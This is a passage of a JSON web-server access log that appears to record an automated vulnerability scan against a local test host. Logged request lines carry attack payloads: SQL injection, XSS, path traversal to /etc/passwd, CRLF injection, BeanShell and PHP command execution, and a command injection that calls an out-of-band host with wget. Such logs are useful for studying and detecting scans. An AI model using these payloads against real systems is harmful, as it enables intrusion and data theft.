AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.035","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.042","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFkiOqxTd2khQTpksbQBx6Vq.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('297MFgexJ2EbKwAv0kRVcoTcSFn')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"&uid=10; wget http://c9v8gc8smpv8b0ng0t00wwuwa5pkxsicy.oast.online","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 